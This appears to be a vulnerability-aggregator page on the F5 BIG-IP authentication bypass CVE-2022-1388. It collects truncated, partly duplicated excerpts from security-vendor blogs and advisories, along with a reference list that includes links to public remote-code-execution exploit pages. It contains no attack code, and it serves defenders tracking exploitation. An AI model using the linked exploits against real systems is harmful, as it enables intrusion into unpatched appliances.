On a bi-weekly basis, FortiGuard Labs gathers data on ransomware variants of interest that have been gaining traction within our datasets and the OSINT community. The Ransomware Roundup report aims to provide readers with brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
This edition of the Ransomware Roundup covers the Cl0p ransomware.
Affected platforms: Microsoft Windows, Linux
Impacted parties: Microsoft Windows, Linux Users
Impact: Encrypts and exfiltrates victims’ files and demands ransom for file decryption and not to leak stolen files
Severity level: High
Recently, the Cl0p ransomware group received
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Qualys
NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
blogs_qualys·2022-10-07·CVSS 10.0
[CRITICAL] NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
## Table of Contents
Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
Identify Vulnerable Assets using Qualys Threat Protection
Recommendations & Mitigations
Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and I
Qualys
NSA Alert: Topmost CVEs Actively Exploited By PRC Sponsored Cyber Actors | Qualys
blogs_qualys·2022-10-07
NSA Alert: Topmost CVEs Actively Exploited By PRC Sponsored Cyber Actors | Qualys
#### Table of Contents
- Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
- Identify Vulnerable Assets using Qualys Threat Protection
- Recommendations & Mitigations
- Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurit
Tenable
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
blogs_tenable·2022-10-07
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
blogs_unit42·2022-07-26
Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
## Executive Summary
Software vulnerabilities remain a key avenue of initial access for attackers according to the 2022 Unit 42 Incident Response Report. While this underscores the need for organizations to operate with a well-defined patch management strategy, we’ve observed that attackers are increasingly quick to exploit high-profile zero-day vulnerabilities, further increasing the time pressure on organizations when a new vulnerability is disclosed.
The 2022 Unit 42 Incident Response Report analyzes more than 600 incident response cases conducted over the past year alongside in-depth interviews with our incident response experts to identify key patterns and trends that can be used by defenders to prioritize where and how to deploy protections.
Here, we share key insights from the re
Unit42
Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
blogs_unit42·2022-07-26
Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
Threat Research Center
Trend Reports
Vulnerabilities
## Attackers Move Quickly to Exploit High-Profile Zero Days: Insights From the 2022 Unit 42 Incident Response Report
Unit 42
Published: July 26, 2022
Trend Reports
Vulnerabilities
Apache Log4j
ProxyLogon
ProxyShell
SonicWall RCE
Unit 42 Incident Response Report
Zero-day
Zoho ManageEngine
## Executive Summary
Software vulnerabilities remain a key avenue of initial access for attackers according to the 2022 Unit 42 Incident Response Report . While this underscores the need for organizations to operate with a well-defined patch management strategy, we’ve observed that attackers are increasingly quick to exploit high-profile zero-day vulnerabilities, further increasing the time pressure on organizations when a new vulnera
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-06-17
Cybersecurity Snapshot: 6 Things That Matter Right Now
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
So Many CVEs, So Little Time: Zero In and ‘Zero Click’ into the Current Vulnerability Landscape
blogs_tenable·2022-06-08
So Many CVEs, So Little Time: Zero In and ‘Zero Click’ into the Current Vulnerability Landscape
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire
blogs_talos·2022-05-19
Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire
Welcome to this week’s edition of the Threat Source newsletter.
I will openly admit that I still own a “classic” iPod — the giant brick that weighed down my skinny jeans in high school and did nothing except play music. There are dozens of hours of music on there that I always tell myself I’m going to back up somewhere and never do. The iPod doesn’t have any charge at the moment, and I still need to hop on eBay to buy one of those flat chargers for it to even start the backup process. So no, I’m sure I’ll never get around to backing it up and recycling the device.
But that doesn’t make it any less painful to hear that Apple is going to stop making iPods altogether. I’m a longtime iPod user and have owned everything from the original “stick of gum” iPod shuffle, to the tiny, square iPod n
Talos
Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire
blogs_talos·2022-05-19
Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire
## Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire
Welcome to this week’s edition of the Threat Source newsletter.
I will openly admit that I still own a “classic” iPod — the giant brick that weighed down my skinny jeans in high school and did nothing except play music. There are dozens of hours of music on there that I always tell myself I’m going to back up somewhere and never do. The iPod doesn’t have any charge at the moment, and I still need to hop on eBay to buy one of those flat chargers for it to even start the backup process. So no, I’m sure I’ll never get around to backing it up and recycling the device.
But that doesn’t make it any less painful to hear that Apple is going to stop making iPods altogether . I’m a longtime iPod user and h
Checkpoint
16th May – Threat Intelligence Report
blogs_checkpoint·2022-05-16
CVE-2022-1388 16th May – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 16th May – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 16th May, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research revealed a yearlong campaign targeting German companies, focused on German car dealerships and manufacturers. Threat actors used a vast infrastructure designed to mimic existing German companies and leveraged phishing emails, with a combination of ISO\HTA payloads that, if opened, would infect victims with va
Talos
Threat Advisory: Critical F5 BIG-IP Vulnerability
blogs_talos·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] Threat Advisory: Critical F5 BIG-IP Vulnerability
## Threat Advisory: Critical F5 BIG-IP Vulnerability
## Summary
A recently disclosed vulnerability in F5 Networks' BIG-IP could allow an unauthenticated attacker to access the BIG-IP system to execute arbitrary system commands, create and delete files, disable services and could lead to additional malicious activity.
This vulnerability, tracked as CVE-2022-1388 is an authentication bypass vulnerability in F5's BIG-IP modules affecting the iControl REST component. BIG-IP is F5's line of appliances that organizations use as load balancers, firewalls, and for inspection and encryption of data passing in to and out of networks. The vulnerability has a CVSS score of 9.8 out of a possible 10 and is considered critical.
F5 discovered the vulnerability on May 4, 2022 and has subsequently relea
Talos
Threat Advisory: Critical F5 BIG-IP Vulnerability
blogs_talos·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] Threat Advisory: Critical F5 BIG-IP Vulnerability
## Summary
A recently disclosed vulnerability in F5 Networks' BIG-IP could allow an unauthenticated attacker to access the BIG-IP system to execute arbitrary system commands, create and delete files, disable services and could lead to additional malicious activity.
This vulnerability, tracked as CVE-2022-1388 is an authentication bypass vulnerability in F5's BIG-IP modules affecting the iControl REST component. BIG-IP is F5's line of appliances that organizations use as load balancers, firewalls, and for inspection and encryption of data passing in to and out of networks. The vulnerability has a CVSS score of 9.8 out of a possible 10 and is considered critical.
F5 discovered the vulnerability on May 4, 2022 and has subsequently released a security advisory and patches, along with a subs
Unit42
Threat Brief: CVE-2022-1388
blogs_unit42·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] Threat Brief: CVE-2022-1388
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: CVE-2022-1388
Unit 42
Published: May 10, 2022
High Profile Threats
Vulnerabilities
BIG-IP
CVE-2022-1388
## Executive Summary
On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388 . Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score . Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention si
Unit42
Threat Brief: CVE-2022-1388
blogs_unit42·2022-05-10·CVSS 9.8
CVE-2022-1388 [CRITICAL] Threat Brief: CVE-2022-1388
## Executive Summary
On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.
Checkpoint
9th May – Threat Intelligence Report
blogs_checkpoint·2022-05-09
CVE-2021-22600 9th May – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 9th May – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 9th May, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
The Ukrainian IT army has disrupted Russia’s alcohol distribution by performing DDoS attacks to limit access to a portal called State Automated Alcohol Accounting Information System (EGAIS) used by the Russian government.
Pro-Ukrainian actors have used compromised Docker Engine honeypots to execute two Docker images downloaded ove
Tenable
CVE-2022-1388: Authentication Bypass in F5 BIG-IP
blogs_tenable·2022-05-05·CVSS 9.8
[CRITICAL] CVE-2022-1388: Authentication Bypass in F5 BIG-IP
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
Mining The Undiscovered Country With GreyNoise EAP Sensors: F5 BIG-IP Edition
blogs_greynoiseio·CVSS 9.8
[CRITICAL] Mining The Undiscovered Country With GreyNoise EAP Sensors: F5 BIG-IP Edition
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
5 Ways to Take Your Vulnerability Management Program to the Next Level
blogs_recorded_future
5 Ways to Take Your Vulnerability Management Program to the Next Level
# 5 Ways to Take Your Vulnerability Management Program to the Next Level
If you ask a security practitioner “what is vulnerability intelligence,” the most common answer you’ll receive will be “information to understand if a vulnerability has been exploited in the wild.” And that’s not a bad answer. There were more than 20,000 vulnerabilities disclosed in 2021, but, in reality, only a small percentage will ever be exploited by threat actors in the wild. More than ever, security practitioners need a better way to prioritize what matters most. Using intelligence to identify exploited vulnerabilities is an extremely effective way to create a plan that reduces risk for your organization.
But vulnerability intelligence is significantly more powerful than just finding exploitation; in this blog
Recorded Future
5 Ways to Take Your Vulnerability Management Program to the Next Level
blogs_recorded_future
5 Ways to Take Your Vulnerability Management Program to the Next Level
## 5 Ways to Take Your Vulnerability Management Program to the Next Level
If you ask a security practitioner “what is vulnerability intelligence,” the most common answer you’ll receive will be “information to understand if a vulnerability has been exploited in the wild.” And that’s not a bad answer. There were more than 20,000 vulnerabilities disclosed in 2021, but, in reality, only a small percentage will ever be exploited by threat actors in the wild. More than ever, security practitioners need a better way to prioritize what matters most. Using intelligence to identify exploited vulnerabilities is an extremely effective way to create a plan that reduces risk for your organization.
But vulnerability intelligence is significantly more powerful than just finding exploitation; in this blo
Greynoiseio
Observed in the Wild: F5 BIG-IP CVE-2022-1388
blogs_greynoiseio·CVSS 9.8
[CRITICAL] Observed in the Wild: F5 BIG-IP CVE-2022-1388
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Intelligence Dives Deep into the Cybersecurity Landscape with its 2022 Mass Exploitation Report
blogs_greynoiseio
GreyNoise Intelligence Dives Deep into the Cybersecurity Landscape with its 2022 Mass Exploitation Report
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise 2022 Mass Exploitation Report
blogs_greynoiseio
GreyNoise 2022 Mass Exploitation Report
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
The Confusing History of F5 BIG-IP RCE Vulnerabilities
blogs_greynoiseio·CVSS 9.8
[CRITICAL] The Confusing History of F5 BIG-IP RCE Vulnerabilities
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise
blogs_greynoiseio
GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167118/F5-BIG-IP-16.0.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167150/F5-BIG-IP-iControl-Remote-Code-Execution.htmlhttps://support.f5.com/csp/article/K23605346https://www.secpod.com/blog/critical-f5-big-ip-remote-code-execution-vulnerability-patch-now/http://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167118/F5-BIG-IP-16.0.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167150/F5-BIG-IP-iControl-Remote-Code-Execution.htmlhttps://support.f5.com/csp/article/K23605346https://www.secpod.com/blog/critical-f5-big-ip-remote-code-execution-vulnerability-patch-now/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-1388
2022-05-05
Published
2022-05-10
Added to CISA KEV
Exploited in the wild